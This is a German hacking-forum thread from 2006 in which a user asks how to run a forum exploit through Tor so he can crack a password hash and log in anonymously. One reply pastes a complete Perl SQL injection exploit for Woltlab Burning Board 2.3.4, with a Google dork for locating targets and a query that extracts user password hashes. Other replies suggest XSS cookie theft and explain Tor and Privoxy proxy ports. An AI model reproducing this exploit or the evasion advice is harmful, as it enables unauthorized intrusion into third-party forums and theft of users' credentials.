#1 22. Mai 2006 hi, sollte ich schon einen Proxy benutzen, wenn ich den Exploit mit Active Perl ausführe oder erst wenn ich den Hash entschlüsselt habe und mich einloggen will??? mfg johnny + Multi-Zitat Zitieren
#2 22. Mai 2006 huhu, naja rein vom logischen erstellt er ja beim exploiten ne verbindung zum server... also wird deine ip übermittelt. mfg halloween + Multi-Zitat Zitieren
#3 22. Mai 2006 Hast du denn eine Ahnung, ob ich TOR auch als Proxy nehmen kann??? + Multi-Zitat Zitieren
#5 22. Mai 2006 spricht nix dagegen warum du das nicht benutzen könntest See ya + Multi-Zitat Zitieren
#6 22. Mai 2006 Und wo müsste ich dann 127.0.0.1 9050 angeben? Müsste das dann so aussehen? mfg johnny + Multi-Zitat Zitieren
#8 22. Mai 2006 1. ich würde es mit dem exploit lassen... das ding stellt 100e Verbindungen zum Server her... sehr leicht zu loggen, teilweise werden die singer rausgefiltert... und dann dem Admin gemeldet! 2. my $proxy = '127.0.0.1'; # proxy, you can leave this empty da würde ich mal vermuten, dass der port fehlt... 127.0.0.1:80 als beispiel 3. wenn du unbedingt ein board hacken muss, dann machs doch mit der xss avatar technik... (google.de) 4. wenns n protal auf 2.3.4 ist (jgs-portal)---> Code: #!/usr/bin/perl use IO::Socket; print q{ ################################################################################ ## ## ## Woltlab Burning Board 2.3.4 <= "links.php" <= SQL Injection Exploit ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## Exploit by | LoK-Crew ## ## Vulnerability by | x82 ## ## Googledork | inurl:/wbb2/links.php?cat ## ## Usage | links.pl [server] [path] ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## ## ################################################################################ }; $webpage = $ARGV[0]; $directory = $ARGV[1]; if (!$webpage||!$directory) { die "[+] Exploit failed\n"; } $wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n"; print "[+] Exploiting....\n"; print $sock "GET $wbb_dir HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: Hacker\n"; print $sock "Host: $webpage\n"; print $sock "Connection: close\n\n"; while ($answer = <$sock>) { if ($answer =~ /(................................)<\/b><\/font>/) { print "[+] Hash: $1\n"; exit(); } if ($answer =~ /SQL-DATABASE ERROR/) { break; } } $wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users"; close($sock); $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n"; print $sock "GET $wbb_dir HTTP/1.1\n"; print $sock "Accept: */*\n"; print $sock "User-Agent: Hacker\n"; print $sock "Host: $webpage\n"; print $sock "Connection: close\n\n"; while ($answer = <$sock>) { if ($answer =~ /(................................)<\/b><\/font>/) { print "[+] Hash: $1\n"; exit(); } if ($answer =~ /SQL-DATABASE ERROR/) { print "[+] Try replacing bb1_users with bb2_users\n"; break; } } close($sock); print "[+] Exploit failed\n"; + Multi-Zitat Zitieren
#9 22. Mai 2006 Was noch nicht ist kann ja noch werden! So, ich will ja kein WBB 2.3.4 hacken, sondern nur 2.3.1 und die sind eh fast alle nicht mehr in Betrieb! Denke, mal das die Avatar Cookie Klau Technik noch ein bissl gefährlicher ist! Und das SQl-blublublub Exploit ist auch der einzige den ich für WBB 2.3.1 gefunden habe der mit zu stimmt. Jetzt hätte ich gerne mal vernünftige Antowrten und nicht mehr so viel "Spam" ! mfg johnny + Multi-Zitat Zitieren
#11 23. Mai 2006 LoL? Mir wurde gesagt, dass wenn ich den Port 9050 in die .txt schreibe, dass ich einen Socks5 und bei 8118 nen Socks4! + Multi-Zitat Zitieren
#12 23. Mai 2006 1. du kannst über über einen Socksproxy nicht direkt HTML übertragen... (Stichwort: http proxy) 2. my $proxy = 'www.meinproxy.de:8080'; 3. my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80); // wie wäre es mit einer Sektion: "wie verwende ich Exploits - und HACKE damit wbb" ^^ [Deckung IRONIE] + Multi-Zitat Zitieren
#13 23. Mai 2006 // für TOR: Also Port 9050 => Socks Port 8118 => HTTP Socks Port kann man editieren bzw. verändern also auf einen anderen Port legen HTTP nicht ist fest auf Port 8118 klingt komisch ? is aber so ! + Multi-Zitat Zitieren
#14 23. Mai 2006 nur mit Tor und Privoxy und der standart Einstellung. Socks und HTTP Proxy können an allen Ports horchen. Für HTTP-Proxys wird oft auch 80 oder 8080 genommen. + Multi-Zitat Zitieren
#15 23. Mai 2006 Solange du das nicht im guten EU lande machst ist es nicht Zwingend erforderlich einen proxy zu benutzen.Da du aber bestimmt im besitz eines stro`z bist würde es sich doch anbieten über die command von dort aus etwas in richtung exploiten zu machen ? Oder am besten noch die finger weg lassen und die armen board admins nicht zur verzweiflung bringen. + Multi-Zitat Zitieren